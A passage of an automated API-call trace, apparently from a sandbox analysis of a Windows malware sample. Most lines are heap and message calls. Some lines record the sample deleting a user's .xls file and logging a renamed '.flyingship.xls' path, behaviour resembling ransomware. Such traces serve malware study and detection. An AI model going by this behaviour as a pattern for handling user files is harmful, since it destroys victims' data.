hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.760] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.760] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.760] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.760] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0172.760] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0172.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.761] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0172.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0172.763] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.763] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.763] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.763] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.763] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", lpFilePart=0x0) returned 0x50 [0172.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabf6780, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x817489c0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0xc536200, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14707, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="oxnDwHiXTyJqTe06unb5.xls", cAlternateFileName="OXNDWH~1.XLS")) returned 0x90ae18 [0172.764] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\oxndwhixtyjqte06unb5.xls")) returned 1 [0172.768] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabf6780, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x817489c0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0xc536200, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14707, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="oxnDwHiXTyJqTe06unb5.xls", cAlternateFileName="OXNDWH~1.XLS")) returned 0 [0172.769] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.769] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.770] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.770] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.770] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.771] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.771] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.771] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.771] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.771] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.771] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.772] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0172.772] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.772] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.774] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0172.774] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x1124, lpOverlapped=0x0) returned 1 [0172.774] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0172.774] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1124, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.774] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.flyingship.xls\r\n", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0172.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.flyingship.xls\r\n", cchWideChar=94, lpMultiByteStr=0x9a5d78, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.flyingship.xls\r\n", lpUsedDefaultChar=0x0) returned 94 [0172.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0172.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0172.775] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5d, lpOverlapped=0x0) returned 1 [0172.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0172.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.775] CloseHandle (hObject=0x138) returned 1 [0172.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0172.778] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0172.778] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0172.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.780] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0172.780] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.780] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0172.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0172.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.780] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0172.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0172.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0172.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0172.781] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, 